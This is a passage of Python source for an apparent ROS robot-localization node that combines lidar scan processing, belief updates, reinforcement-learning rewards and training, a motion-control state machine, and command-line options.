to_real(self.true_grid.col, self.ylim, self.grid_cols) offset = self.heading_resol*self.true_grid.head ranges = self.get_a_scan(x, y, offset=offset, noise=0) params = {'ranges': ranges, 'angle_min': math.radians(mindeg), 'angle_max': math.radians(maxdeg), 'range_min': self.min_scan_range, 'range_max': self.max_scan_range} self.scan_data_at_unperturbed = Lidar(**params) def get_lidar_bottom(self): params = {'ranges': self.raw_scan_bottom.ranges, 'angle_min': self.raw_scan_bottom.angle_min, 'angle_max': self.raw_scan_bottom.angle_max, 'range_min': self.raw_scan_bottom.range_min, 'range_max': self.raw_scan_bottom.range_max} self.scan_data_bottom = Lidar(**params) def fwd_clear(self): robot_width = 2*self.collision_radius safe_distance = 0.05 + self.collision_radius left_corner = (wrap_2pi(np.arctan2(self.collision_radius, safe_distance))) right_corner = (wrap_2pi(np.arctan2(-self.collision_radius, safe_distance))) angles = self.scan_data.angles_2pi ranges = self.scan_data.ranges_2pi[(angles < left_corner) | (angles > right_corner)] ranges = ranges[(ranges != np.nan) & (ranges != np.inf) ] if ranges.size == 0: return True else: pass val = np.min(ranges) if val > safe_distance: return True else: print ('top',val) rospy.logwarn("Front is Not Clear ! (Top Scan)") return False def fwd_clear_bottom(self): if self.scan_bottom_ready: self.scan_bottom_ready = False else: return True safe_distance = 0.20 fwd_margin=safe_distance robot_rad = self.collision_radius left_corner = (wrap_2pi(np.arctan2(robot_rad, safe_distance))) right_corner = (wrap_2pi(np.arctan2(-robot_rad, safe_distance))) angles = self.scan_data_bottom.angles_2pi ranges = self.scan_data_bottom.ranges_2pi[(angles < left_corner) | (angles > right_corner)] # ranges = self.scan_data_bottom.ranges_2pi ranges = ranges[(ranges != np.nan) & (ranges != np.inf) ] if ranges.size == 0: return True else: pass val = np.min(ranges) if val > safe_distance: return True else: print ('bot',val) rospy.logwarn("Front is Not Clear ! (Bottom)") return False def execute_action_teleport(self): if self.args.verbose>1: print("execute_action_teleport") if self.collision: return False # if self.action_str == "go_fwd_blocked": # return True # if self.args.perturb > 0: # self.turtle_pose_msg.position.x = self.perturbed_goal_pose.x # self.turtle_pose_msg.position.y = self.perturbed_goal_pose.y # yaw = self.perturbed_goal_pose.theta # else: # self.turtle_pose_msg.position.x = self.goal_pose.x # self.turtle_pose_msg.position.y = self.goal_pose.y # yaw = self.goal_pose.theta # self.turtle_pose_msg.orientation = geometry_msgs.msg.Quaternion(*tf_conversions.transformations.quaternion_from_euler(0, 0, yaw)) self.teleport_turtle() return True def transit_belief(self): if self.args.verbose>1: print("transit_belief") self.belief = self.belief.cpu().detach().numpy() if self.collision == True: self.prior = np.copy(self.belief) self.belief = torch.from_numpy(self.belief).float().to(self.device) return self.belief=self.trans_bel(self.belief, self.action_str) self.belief = torch.from_numpy(self.belief).float().to(self.device)#$ requires_grad=True) self.prior = np.copy(self.belief) def trans_bel(self, bel, action): rotation_step = self.args.rot_step if action == "turn_right": bel=np.roll(bel,-rotation_step, axis=0) elif action == "turn_left": bel=np.roll(bel, rotation_step, axis = 0) elif action == "go_fwd": if self.args.trans_belief == "roll": i=0 bel[i,:,:]=np.roll(bel[i,:,:], -1, axis=0) i=1 bel[i,:,:]=np.roll(bel[i,:,:], -1, axis=1) i=2 bel[i,:,:]=np.roll(bel[i,:,:], 1, axis=0) i=3 bel[i,:,:]=np.roll(bel[i,:,:], 1, axis=1) elif self.args.trans_belief == "stoch-shift" or self.args.trans_belief == "shift": prior = bel.min() for i in range(self.grid_dirs): theta = i * self.heading_resol fwd_dist = self.args.fwd_step dx = fwd_dist*np.cos(theta+np.pi) dy = fwd_dist*np.sin(theta+np.pi) # simpler way: DX = np.round(dx) DY = np.round(dy) shft_hrz = shift(bel[i,:,:], int(DY), axis=1, fill=prior) bel[i,:,:]=shift(shft_hrz, int(DX), axis=0, fill=prior) if self.args.trans_belief == "stoch-shift" and action != "hold": for ch in range(self.grid_dirs): bel[ch,:,:] = ndimage.gaussian_filter(bel[ch,:,:], sigma=self.sigma_xy) n_dir = self.grid_dirs//4 p_roll = 0.20 roll_n = [] roll_p = [] for r in range(1, n_dir): if roll_n == [] and roll_p == []: roll_n.append(p_roll*np.roll(bel,-1,axis=0)) roll_p.append(p_roll*np.roll(bel, 1,axis=0)) else: roll_n.append(p_roll*np.roll(roll_n[-1],-1,axis=0)) roll_p.append(p_roll*np.roll(roll_p[-1], 1,axis=0)) bel = sum(roll_n + roll_p)+bel bel /= np.sum(bel) return bel def get_reward(self): self.xyerrs.append(self.get_manhattan(self.belief.cpu().detach().numpy(), ignore_hd = True) ) self.manhattan = self.get_manhattan(self.belief.cpu().detach().numpy(), ignore_hd = False) #manhattan distance between gt and belief. self.manhattans.append(self.manhattan) if self.args.verbose > 2: print ("manhattans", len(self.manhattans)) self.reward = 0.0 self.reward_vector = np.zeros(5) # if self.args.penalty_for_block and self.action_str == "go_fwd_blocked": if self.args.penalty_for_block != 0 and self.collision == True: self.reward_vector[0] -= self.args.penalty_for_block self.reward += -self.args.penalty_for_block if self.args.rew_explore and self.new_pose: self.reward_vector[1] += 1.0 self.reward += 1.0 if self.args.rew_bel_new and self.new_bel: self.reward_vector[1] += 1.0 self.reward += 1.0 if self.args.rew_bel_gt: N = self.grid_dirs*self.grid_rows*self.grid_cols self.reward_vector[2] += torch.log(N*self.belief[self.true_grid.head,self.true_grid.row,self.true_grid.col]).item() #detach().cpu().numpy() self.reward += torch.log(N*self.belief[self.true_grid.head,self.true_grid.row,self.true_grid.col]).item() #.data #detach().cpu().numpy() if self.args.rew_bel_gt_nonlog: self.reward_vector[2] += self.belief[self.true_grid.head,self.true_grid.row,self.true_grid.col].item()#detach().cpu().numpy() self.reward += self.belief[self.true_grid.head, self.true_grid. row,self.true_grid.col].item()#detach().cpu().numpy() if self.args.rew_KL_bel_gt: bel_gt = self.belief[self.true_grid.head, self.true_grid.row, self.true_grid.col].item()#detach().cpu().numpy() N = self.grid_dirs*self.grid_rows*self.grid_cols new_bel_gt = 1.0/N * np.log(N*np.clip(bel_gt,1e-9,1.0)) self.reward_vector[2] += new_bel_gt self.reward += new_bel_gt #torch.Tensor([new_bel_gt]) if self.args.rew_infogain: #entropy = -p*log(p) # reward = -entropy, low entropy bel = torch.clamp(self.belief, 1e-9, 1.0) # info gain = p*log(p) - q*log(q) # bel=self.belief # info_gain = (bel * torch.log(bel)).sum().detach() - self.bel_ent new_bel_ent = float((bel * torch.log(bel)).sum()) info_gain = new_bel_ent - self.bel_ent self.bel_ent = new_bel_ent self.reward += info_gain self.reward_vector[3] += info_gain if self.args.rew_bel_ent: #entropy = -p*log(p) # reward = -entropy, low entropy # bel = torch.clamp(self.belief, 1e-9, 1.0) bel=self.belief self.reward += (bel * torch.log(bel)).sum().item() #detach().cpu().numpy() self.reward_vector[3] += (bel * torch.log(bel)).sum().item() #detach().cpu().numpy() if self.args.rew_hit: self.reward += 1 if self.manhattan==0 else 0 self.reward_vector[4] += 1 if self.manhattan==0 else 0 if self.args.rew_dist: self.reward += (self.longest-self.manhattan)/self.longest self.reward_vector[4] = (self.longest-self.manhattan)/self.longest if self.args.rew_inv_dist: self.reward += 1.0/(self.manhattan+1.0) self.reward_vector[4] = 1.0/(self.manhattan+1.0) self.reward = float(self.reward) self.rewards.append(self.reward) if self.args.verbose > 2: print ("rewards", len(self.rewards)) if np.isnan(self.reward): raise Exception('reward=nan') if self.args.verbose > 1: print ('reward=%f'%self.reward) def get_euclidean(self): return np.sqrt((self.believed_pose.x - self.current_pose.x)**2+(self.believed_pose.y - self.current_pose.y)**2) def get_manhattan(self, bel, ignore_hd = False): # guess = np.unravel_index(np.argmax(bel, axis=None), bel.shape) guess = (self.bel_grid.head, self.bel_grid.row, self.bel_grid.col) #[self.bel_grid.head,self.bel_grid.x, self.bel_grid.y] e_dir = abs(guess[0]-self.true_grid.head) e_dir = min(self.grid_dirs-e_dir, e_dir) if ignore_hd: e_dir = 0 return float(e_dir+abs(guess[1]-self.true_grid.row)+abs(guess[2]-self.true_grid.col)) def back_prop(self): if self.args.markov: return if self.optimizer == None: return if self.args.verbose>1: print("back_prop") self.Ret = torch.zeros(1,1).detach() self.values.append(self.Ret) if self.args.verbose > 2: print ("values:", len(self.values)) print ("rewards:", len(self.rewards)) print ("log_probs:", len(self.log_probs)) policy_loss = 0 value_loss = 0 gae = torch.zeros(1,1).detach() #Generalized advantage estimate #gae = 0 for i in reversed(range(len(self.rewards))): self.Ret = self.gamma * self.Ret + self.rewards[i] advantage = self.Ret - self.values[i] value_loss = value_loss + 0.5 * advantage.pow(2) #Generalized advantage estimate delta_t = self.rewards[i] \ + self.gamma * self.values[i+1].data\ - self.values[i].data gae = gae * self.gamma * self.tau + delta_t policy_loss = policy_loss - self.log_probs[i] * gae - self.entropy_coef * self.entropies[i] #R = self.gamma * R + self.rewards[i] + self.args.lamda * self.intri_rewards[i] #advantage = R - self.values[i] #value_loss = value_loss + 0.5 * advantage.pow(2) #delta_t = self.rewards[i] + self.args.lamda * self.intri_rewards[i].data + self.gamma * self.values[i + 1].data - self.values[i].data #gae = gae * self.gamma * self.tau + delta_t #policy_loss = policy_loss - self.log_probs[i] * Variable(gae) - self.entropy_coef * self.entropies[i] ### for logging purpose ### self.loss_policy = policy_loss.item() self.loss_value = value_loss.item() ### ### self.optimizer.zero_grad() total_loss = policy_loss + self.args.value_loss_coeff * value_loss (policy_loss + self.args.value_loss_coeff * value_loss).backward(retain_graph=True) torch.nn.utils.clip_grad_norm(self.policy_model.parameters(), self.max_grad_norm) # print ('bp grad value') # print (self.optimizer.param_groups[0]['params'][0]) if self.args.schedule_rl: self.scheduler_rl.step() self.optimizer.step() if self.args.verbose>0: print ("back_prop (RL) done") self.rl_backprop_cnt += 1 if self.rl_backprop_cnt % self.args.mdl_save_freq == 0 and self.args.update_rl and self.args.save: torch.save(self.policy_model.state_dict(), self.rl_filepath) print ('RL model saved at %s.'%self.rl_filepath) def back_prop_pm(self): if self.args.update_pm_by=="GTL" or self.args.update_pm_by=="BOTH": self.optimizer_pm.zero_grad() (sum(self.loss_likelihood)/float(len(self.loss_likelihood))).backward(retain_graph = True) self.optimizer_pm.step() mean_test_loss = sum(self.loss_likelihood).item() if self.args.schedule_pm: # self.scheduler_pm.step(mean_test_loss) self.scheduler_pm.step() self.pm_backprop_cnt += 1 if self.args.save and self.pm_backprop_cnt % self.args.mdl_save_freq == 0: torch.save(self.perceptual_model.state_dict(), self.pm_filepath) print ('perceptual model saved at %s.'%self.pm_filepath) else: return if self.args.verbose>0: print ("back_prop_pm done") def next_step(self): if self.args.verbose>1: print ("next_step") self.step_count += 1 if self.step_count >= self.step_max: self.next_ep() else: self.current_state = "update_likelihood" # if self.step_count % 10 == 0: # torch.cuda.empty_cache() torch.cuda.empty_cache() if self.args.verbose>2: print ("max mem alloc", int(torch.cuda.max_memory_allocated()*1e-6)) print ("max mem cache", int(torch.cuda.max_memory_cached()*1e-6)) print ("mem alloc", int(torch.cuda.memory_allocated()*1e-6)) print ("mem cache", int(torch.cuda.memory_cached()*1e-6)) def next_ep(self): if not self.rl_test: self.back_prop() self.flush_all() # self.save_tflogs() torch.cuda.empty_cache() if self.args.figure: self.ax_rew.clear() self.obj_rew = None if self.args.verbose>1: print ("next_ep") # if self.args.verbose > 0: # self.report_status(end_episode=True) self.action_from_policy = -1 self.action_idx = -1 self.bel_list = [] self.step_count = 0 self.collision = False # reset belief too self.belief[:,:,:]=1.0 self.belief /= self.belief.sum()#np.sum(self.belief, dtype=float) self.bel_ent = (self.belief * torch.log(self.belief)).sum().detach() self.prior = self.belief.detach().cpu().numpy() self.acc_epi_cnt +=1 self.episode_count += 1 if self.episode_count in range(self.episode_max - self.args.test_ep, self.episode_max): self.rl_test = True else: self.rl_test = False if self.episode_count == self.episode_max: self.next_env() else: self.current_state = "new_pose" def next_env(self): if self.args.verbose>1: print ("next_env") # if not self.rl_test: # self.back_prop() self.episode_count = 0 self.env_count += 1 if self.env_count == self.env_max: self.wrap_up() exit() else: self.current_state = "new_env_pose" def flush_all(self): # reset for back_prop self.loss_policy = 0 self.loss_value = 0 self.values = [] self.log_probs = [] self.rewards = [] self.manhattans=[] self.xyerrs=[] self.intri_rewards = [] self.reward = 0 self.entropies = [] def wrap_up(self): if self.args.save: if self.args.verbose > -1: print ('output saved at %s'%self.log_filepath) # save parameters if self.args.update_pm_by != "NONE": torch.save(self.perceptual_model.state_dict(), self.pm_filepath) print ('perceptual model saved at %s.'%self.pm_filepath) if self.args.update_rl: torch.save(self.policy_model.state_dict(), self.rl_filepath) print ('RL model saved at %s.'%self.rl_filepath) if self.args.update_ir: torch.save(self.intri_model.state_dict(), self.ir_filepath) print ('Intrinsic reward model saved at %s.'%self.ir_filepath) #Later to restore: # model.load_state_dict(torch.load(filepath)) # model.eval() if self.args.verbose > -1: print ('training took %s'%(time.time()-self.start_time)) def save_tflogs(self): if self.args.tflog == True: #Log scalar values info = { 'policy_loss': self.loss_policy, 'value_loss': self.loss_value, 'pol-val weighted loss': self.loss_policy+self.args.value_loss_coeff*self.loss_value, 'discounted_reward': self.Ret.item(), 'total_reward': (np.float_(sum(self.rewards))).item(), 'likelihood_loss': self.loss_likelihood.item() } for tag, value in info.items(): logger.scalar_summary(tag, value, self.episode_count) #Log values and gradients of the params (histogram summary) if self.args.update_rl: for tag, value in self.policy_model.named_parameters(): tag = tag.replace('.', '/') logger.histo_summary(tag, value.data.cpu().numpy(), self.episode_count) logger.histo_summary(tag+'/policy_grad', value.grad.data.cpu().numpy(), self.episode_count) if self.args.update_pm_by!="NONE": for tag, value in self.perceptual_model.named_parameters(): tag = tag.replace('.', '/') logger.histo_summary(tag, value.data.cpu().numpy(), self.episode_count) logger.histo_summary(tag+'/perceptual_grad', value.grad.data.cpu().numpy(), self.episode_count) if self.args.update_ir: for tag, value in self.intri_model.named_parameters(): tag = tag.replace('.', '/') logger.histo_summary(tag, value.data.cpu().numpy(), self.episode_count) logger.histo_summary(tag+'/intri_grad', value.grad.data.cpu().numpy(), self.episode_count) def cb_active(self): rospy.loginfo("Goal pose is now being processed by the Action Server...") def cb_feedback(self, feedback): #To print current pose at each feedback: #rospy.loginfo("Feedback for goal "+str(self.goal_cnt)+": "+str(feedback)) #rospy.loginfo("Feedback for goal pose received: " + str(feedback)) pass def cb_done(self, status, result): # Reference for terminal status values: http://docs.ros.org/diamondback/api/actionlib_msgs/html/msg/GoalStatus.html if status == 2: rospy.loginfo("Goal pose received a cancel request after it started executing, completed execution!") self.move_result_OK = False if status == 3: rospy.loginfo("Goal pose reached") self.move_result_OK = True if status == 4: rospy.loginfo("Goal pose was aborted by the Action Server") self.move_result_OK = False if status == 5: rospy.loginfo("Goal pose has been rejected by the Action Server") self.move_result_OK = False if status == 8: rospy.loginfo("Goal pose received a cancel request before it started executing, successfully cancelled!") self.move_result_OK = False self.wait_for_move = False return def movebase_client(self): goal = MoveBaseGoal() goal.target_pose.header.frame_id = "map" goal.target_pose.header.stamp = rospy.Time.now() goal.target_pose.pose.position.x = -self.goal_pose.y goal.target_pose.pose.position.y = self.goal_pose.x q_goal = quaternion_from_euler(0,0, wrap(self.goal_pose.theta+np.pi*0.5)) goal.target_pose.pose.orientation.x = q_goal[0] goal.target_pose.pose.orientation.y = q_goal[1] goal.target_pose.pose.orientation.z = q_goal[2] goal.target_pose.pose.orientation.w = q_goal[3] rospy.loginfo("Sending goal pose to Action Server") rospy.loginfo(str(goal)) self.wait_for_move = True self.client.send_goal(goal, self.cb_done, self.cb_active, self.cb_feedback) def prep_jay(self): # load map, init variables, etc. self.clear_objects() self.read_map() self.make_low_dim_maps() if self.args.gtl_off == False: # generate synthetic scan data over the map (and directions) self.get_synth_scan_mp(self.scans_over_map, map_img=self.map_for_LM, xlim=self.xlim, ylim=self.ylim) self.reset_explored() self.update_current_pose_from_robot() self.update_true_grid() self.sync_goal_to_true_grid() if self.args.figure==True: self.update_figure(newmap=True) def loop_jay(self, timer_ev): if self.fsm_state == "init": # prep jay self.prep_jay() self.fsm_state = "new_episode" if self.args.verbose >= 1: print ("[INIT] prep_jay done") return elif self.fsm_state == "sense": # wait for scan self.scan_once = True self.scan_bottom_once = True self.fsm_state = "sensing" # if self.args.verbose >= 1: # print ("[SENSE] Wait for scan.") self.mark_time = time.time() return elif self.fsm_state == "sensing": if self.scan_ready: self.scan_ready = False if self.scan_cnt > 10: self.scan_cnt = 0 self.fsm_state = "localize" if self.args.verbose >= 1: print ("[SENSING DONE]") print ("[TIME for SENSING] %.3f sec"%(time.time()-self.mark_time)) else: if self.scan_cnt == 0: self.saved_ranges = np.array(self.raw_scan.ranges) else: self.saved_ranges = np.min( np.stack( (self.saved_ranges, np.array(self.raw_scan.ranges)), axis = 0), axis = 0) self.scan_cnt += 1 self.fsm_state = "sense" return elif self.fsm_state == "localize": if self.args.verbose >= 1: print ("[LOCALIZE]") # process lidar data # self.get_lidar() time_mark = time.time() self.do_scan_2d_n_headings() print ("[TIME for SCAN TO 2D IMAGE] %.3f sec"%(time.time()-time_mark)) self.slide_scan() # do localization and action sampling self.update_explored() time_mark = time.time() self.compute_gtl(self.scans_over_map) print ("[TIME for GTL] %.2f sec"%(time.time()-time_mark)) time_mark = time.time() self.likelihood = self.update_likelihood_rotate(self.map_for_LM, self.scan_2d) print ("[TIME for LM] %.2f sec"%(time.time()-time_mark)) # if self.collision == False: self.product_belief() self.update_believed_pose() self.update_map_T_odom() self.update_bel_list() self.get_reward() time_mark = time.time() if self.args.verbose>0: self.report_status(end_episode=False) if self.args.figure: self.update_figure() if self.save_roll_out: self.collect_data() print ("logging, saving, figures: %.2f sec"%(time.time()-time_mark)) if self.step_count >= self.step_max-1: self.fsm_state = "end_episode" if self.args.random_policy: fwd_collision = self.collision_fnc(0, 0, 0, self.scan_2d_slide) if fwd_collision: num_actions = 2 else: num_actions = 3 self.action_from_policy = np.random.randint(num_actions) self.action_str = self.action_space[self.action_from_policy] else: self.get_action() else: self.fsm_state = "decide" elif self.fsm_state == "decide": # decide move if self.args.verbose >= 1: print ("[Sample Action]") self.run_action_module() if self.skip_to_end: self.skip_to_end = False self.fsm_state = "end_episode" return self.update_target_pose() self.fsm_state = "move" elif self.fsm_state == "move": if self.args.verbose >= 1: print ("[MOVE]") # do motion control self.collision_check() if self.collision: rospy.logwarn("Front is not clear. Abort action.") self.fsm_state = "end_step" else: if self.args.use_movebase: self.movebase_client() else: self.init_motion_control() self.fsm_state = "moving" self.mark_time = time.time() self.wait_for_move = True self.scan_on = True if self.args.verbose >= 1: print ("[MOVING]") elif self.fsm_state == "moving": if not self.args.use_movebase: self.wait_for_move = self.do_motion_control() if self.wait_for_move == False: self.fsm_state = "trans-belief" self.scan_on = False if self.args.verbose >= 1: print ("[DONE MOVING]") print ("[TIME for MOTION] %.3f sec"%(time.time()-self.mark_time)) elif self.fsm_state == "trans-belief": if self.args.verbose >= 1: print ("[TRANS-BELIEF]") self.transit_belief() self.fsm_state = "update_true_pose" elif self.fsm_state == "update_true_pose": self.update_current_pose_from_robot() self.update_true_grid() self.fsm_state = "end_step" elif self.fsm_state == "end_step": self.step_count += 1 # end of step self.fsm_state = "sense" elif self.fsm_state == "end_episode": self.end_episode() if self.episode_count >= self.episode_max: rospy.loginfo("Max episode "+str(self.episode_count)+" reached.") self.quit_sequence() # and quit. else: self.fsm_state = "new_episode" elif self.fsm_state == "new_episode": self.new_episode() self.fsm_state = "spawn" elif self.fsm_state == "spawn": if self.wait_for_move == False: self.fsm_state = "sense" self.scan_on = False if self.args.verbose >= 1: print ("[DONE MOVING]") self.update_current_pose_from_robot() self.update_true_grid() else: print (self.fsm_state) rospy.logerr("Unknown FSM state") rospy.signal_shutdown("Unknown FSM state") exit() return def end_episode(self): if self.args.verbose > 0: print ("[END EPISODE]") if not self.rl_test: self.back_prop() self.flush_all() if self.args.figure: self.ax_rew.clear() self.obj_rew = None self.acc_epi_cnt +=1 self.episode_count += 1 def new_episode(self): if self.args.verbose > 0: print ("[NEW EPISODE]") self.action_from_policy = -1 self.action_idx = -1 self.bel_list = [] self.step_count = 0 self.scan_cnt = 0 self.collision = False # reset belief too self.belief[:,:,:]=1.0 self.belief /= self.belief.sum()#np.sum(self.belief, dtype=float) self.bel_ent = (self.belief * torch.log(self.belief)).sum().detach() self.prior = self.belief.detach().cpu().numpy() if self.args.load_init_poses=="none" and self.episode_count==0: cnt = 0 self.init_poses=np.zeros((self.episode_max,3),np.float32) while cnt < self.episode_max: self.sample_a_pose() self.init_poses[cnt,0] = self.goal_pose.x self.init_poses[cnt,1] = self.goal_pose.y self.init_poses[cnt,2] = self.goal_pose.theta cnt += 1 if self.args.save: np.save(os.path.join(self.data_path, 'init_poses.npy'), self.init_poses) print (os.path.join(self.data_path, 'init_poses.npy')) print ("sample init poses: done") print (self.init_poses) # load it from saved poses elif self.episode_count == 0: self.init_poses = np.load(self.args.load_init_poses) self.goal_pose.x = to_real(to_index(self.init_poses[self.episode_count, 0], self.grid_rows, self.xlim), self.xlim, self.grid_rows) self.goal_pose.y = to_real(to_index(self.init_poses[self.episode_count, 1], self.grid_cols, self.ylim), self.ylim, self.grid_cols) self.goal_pose.theta = self.init_poses[self.episode_count, 2] # move_base() self.movebase_client() self.save_roll_out = self.args.save & np.random.choice([False, True], p=[1.0-self.args.prob_roll_out, self.args.prob_roll_out]) if self.save_roll_out: #save roll-out for next episode. self.roll_out_filepath = os.path.join(self.log_dir, 'roll-out-%03d-%03d.txt'%(self.env_count,self.episode_count)) def cbScanTop(self, laser_scan_stuff): # print("got in cbScan") # if self.wait_for_scan: if self.scan_on or self.scan_once: self.raw_scan = laser_scan_stuff self.get_lidar() # ? self.scan_ready = True self.scan_once = False # self.wait_for_scan = False return def cbScanBottom(self, laser_scan_stuff): # print("got in cbScan") # if self.wait_for_scan: if self.scan_on or self.scan_bottom_once: self.raw_scan_bottom = laser_scan_stuff self.get_lidar_bottom() self.scan_bottom_ready = True self.scan_bottom_once = False return def cbRobotPose(self, robot_pose): self.live_pose.x = robot_pose.pose.position.y self.live_pose.y = - robot_pose.pose.position.x q_robot = [None]*4 q_robot[0] = robot_pose.pose.orientation.x q_robot[1] = robot_pose.pose.orientation.y q_robot[2] = robot_pose.pose.orientation.z q_robot[3] = robot_pose.pose.orientation.w q_rot = quaternion_from_euler(0,0, -np.pi*.5) robot_ori = quaternion_multiply(q_rot, q_robot) roll,pitch,yaw = euler_from_quaternion(robot_ori) self.live_pose.theta = yaw self.robot_pose_ready = True return def cbOdom(self, odom): qtn=odom.pose.pose.orientation q_odom = [None]*4 q_odom[0] = qtn.x q_odom[1] = qtn.y q_odom[2] = qtn.z q_odom[3] = qtn.w roll,pitch,yaw=euler_from_quaternion(q_odom) #qtn.w, qtn.x, qtn.y, qtn.z) self.odom_pose.x = odom.pose.pose.position.x self.odom_pose.y = odom.pose.pose.position.y self.odom_pose.theta = yaw def onShutdown(self): rospy.loginfo("[LocalizationNode] Shutdown.") def loginfo(self, s): rospy.loginfo('[%s] %s' % (self.node_name, s)) if __name__ == '__main__': #str_date = datetime.datetime.today().strftime('%Y-%m-%d') parser = argparse.ArgumentParser() ## GENERAL parser.add_argument("-c", "--comment", help="your comment", type=str, default='') parser.add_argument("--gazebo", "-gz", action="store_true") parser.add_argument("--jay1", "-j1", action="store_true") parser.add_argument("--use-movebase", action="store_true") parser.add_argument("--save-loc", type=str, default=os.environ['TB3_LOG']) #"tb3_anl/logs") parser.add_argument("--generate-data", action="store_true") parser.add_argument("--n-workers", "-nw", type=int, default=multiprocessing.cpu_count()) parser.add_argument("--load-init-poses", type=str, default="none") ## COLLISION parser.add_argument("--collision-radius", "-cr", type=float, default=0.25) parser.add_argument("--collision-from", type=str, choices=['none','map','scan'], default='map') ## MAPS, EPISODES, MOTIONS parser.add_argument("-n", "--num", help = "num envs, episodes, steps", nargs=3, default=[1,10, 10], type=int) parser.add_argument("--load-map", help = "load an actual map", type=str, default=None) parser.add_argument("--distort-map", action="store_true") parser.add_argument("--flip-map", help = "flip n pixels 0 <--> 1 in map image", type=int, default=0) parser.add_argument("--load-map-LM", help = "load an actual map for LM target", type=str, default=None) parser.add_argument("--load-map-RL", help = "load an actual map for RL state", type=str, default=None) parser.add_argument("--map-pixel", help = "size of a map pixel in real world (meters)", type=float, default=6.0/224.0) #parser.add_argument("--maze-grids-range", type=int, nargs=2, default=[None, None]) parser.add_argument("--n-maze-grids", type=int, nargs='+', default=[5,11]) parser.add_argument("--n-local-grids", type=int, default=11) parser.add_argument("--n-state-grids", type=int, default=11) parser.add_argument("--n-state-dirs", type=int, default=4) parser.add_argument("--RL-type", type=int, default=0, choices=[0,1,2]) # 0: original[map+scan+bel], 1: no map[scan+bel], 2:extended[bel+lik+hd-scan+hd-map] parser.add_argument("--n-lm-grids", type=int, default=11) parser.add_argument("-sr", "--sub-resolution", type=int, default=1) parser.add_argument("--n-headings", "-nh", type=int, default=4) parser.add_argument("--rm-cells", help="num of cells to delete from maze", type=int, default=11) parser.add_argument("--random-rm-cells", type=int, nargs=2, default=[0,0]) parser.add_argument("--backward-compatible-maps","-bcm", action="store_true") parser.add_argument("--random-thickness", action="store_true") parser.add_argument("--thickness", type=float, default=None) parser.add_argument("--save-boundary", type=str, choices=['y','n','r'], default='y') ## Error Sources: ## 1. initial pose - uniform pdf ## 2. odometry (or control) - gaussian pdf ## 3. use scenario: no error or init error + odom error accumulation parser.add_argument("-ie", "--init-error", type=str, choices=['NONE','XY','THETA','BOTH'],default='NONE') parser.add_argument("-pe", "--process-error", type=float, nargs=2, default=[0,0]) parser.add_argument("--fov", help="angles in (fov[0], fov[1]) to be removed", type=float, nargs=2, default=[0, 0]) parser.add_argument("--lidar-noise", help="number of random noisy rays in a scan", type=int, default=0) parser.add_argument("--lidar-sigma", help="sigma for lidar (1d) range", type=float, default=0) parser.add_argument("--scan-range", help="[min, max] scan range (m)", type=float, nargs=2, default=[0.10, 3.5]) ## VISUALIZE INFORMATION parser.add_argument("-v", "--verbose", help="increase output verbosity", type=int, default=0, nargs='?', const=1) parser.add_argument("-t", "--timer", help="timer period (sec) default 0.1", type=float, default=0.1) parser.add_argument("-f", "--figure", help="show figures", action="store_true") parser.add_argument("--figure-save-freq", "-fsf", type=int, default=1) # parser.add_argument("-p", "--print-map", help="print map", action="store_true") ## GPU parser.add_argument("-ug", "--use-gpu", action="store_true") parser.add_argument("-sg", "--set-gpu", help="set cuda visible devices, default none", type=int, default=[],nargs='+') ## MOTION(PROCESS) MODEL parser.add_argument('--trans-belief', help='select how to fill after transition', choices=['shift','roll','stoch-shift'], default='stoch-shift', type=str) parser.add_argument("--fwd-step", "-fs", type=int, default=1) parser.add_argument("--rot-step", "-rs", type=int, default=1) parser.add_argument("--sigma-xy", "-sxy", type=float, default=.5) ## RL-GENERAL parser.add_argument('--update-rl', dest='update_rl', action='store_true') parser.add_argument('--no-update-rl', dest='update_rl',help="don't update AC model", action="store_false") parser.add_argument('--update-ir', dest='update_ir', action='store_true') parser.add_argument('--no-update-ir', dest='update_ir',help="don't update IR model", action="store_false") parser.set_defaults(update_rl=False, update_ir=False) parser.add_argument('--random-policy', action='store_true') parser.add_argument('--markov', action='store_true') ## RL-STATE parser.add_argument('--binary-scan', action='store_true') ## RL-ACTION parser.add_argument("--manual-control","-mc", action="store_true") parser.add_argument('--num-actions', type=int, default=3) parser.add_argument('--test-ep', help='number of test episode at the end of each env', type=int, default=0) parser.add_argument('-a','--action', help='select action : argmax or multinomial', choices=['argmax','multinomial'], default='multinomial', type=str) ## RL-PARAMS parser.add_argument('-lam', '--lamda', help="weight for intrinsic reward, default=0.7", type=float, default=0.7) parser.add_argument('-vlcoeff', '--value_loss_coeff', help="value loss coefficient, default=1.0", type=float, default=1.0) parser.add_argument('-lr', '--lrrl', help="lr for RL (1e-4)", type=float, default=1e-4) parser.add_argument('-cent', '--c-entropy', help="coefficient of entropy in policy loss (0.001)", type=float, default=0.001) ## REWARD # parser.add_argument('--block-penalty', dest='penalty_for_block', help="penalize for blocked fwd", action="store_true") parser.add_argument('--block-penalty', dest='penalty_for_block', help="penalize for blocked fwd", type=float, default=0) parser.add_argument('--rew-explore', help="reward for exploration", action="store_true") parser.add_argument('--rew-bel-new', help='reward for new belief pose', action="store_true") parser.add_argument('--rew-bel-ent', help="reward for low entropy in belief", action="store_true") parser.add_argument('--rew-infogain', help="reward for info gain", action="store_true") parser.add_argument('--rew-bel-gt-nonlog', help="reward for correct belief", action="store_true") parser.add_argument('--rew-bel-gt', help="reward for correct belief", action="store_true") parser.add_argument('--rew-KL-bel-gt', help="reward for increasing belief at gt pose", action="store_true") parser.add_argument('--rew-dist', help="reward for distance", action="store_true") parser.add_argument('--rew-hit', help="reward for distance being 0", action="store_true") parser.add_argument('--rew-inv-dist', help="r=1/(1+d)", action="store_true") ## TRUE LIKELIHOOD parser.add_argument("--gtl-src", help="source of GTL", choices=['hd-cos','hd-corr','hd-corr-clip'], default='hd-cos') parser.add_argument("--gtl-output", choices=['softmax','softermax','linear'], default='softmax') parser.add_argument("-go", "--gtl-off", action="store_true") ## LM-GENERAL parser.add_argument("-temp", "--temperature", help="softmax temperature", type=float, default=1.0) parser.add_argument('--pm-net', help ="select PM network", choices = ['none', 'densenet121', 'densenet169', 'densenet201', 'densenet161', 'resnet18', 'resnet50', 'resnet101', 'resnet152', 'resnet18s', 'resnet50s', 'resnet101s', 'resnet152s'], default='none') parser.add_argument('--pm-loss', choices=['L1','KL'], default='KL') parser.add_argument('--pm-scan-step', type=int, default=1) parser.add_argument('--shade', dest="shade", help="shade for scan image", action="store_true") parser.add_argument('--no-shade', dest="shade", help="no shade for scan image", action="store_false") parser.set_defaults(shade=False) parser.add_argument('--pm-batch-size', '-pbs', help='batch size of pm model.', default=10, type=int) 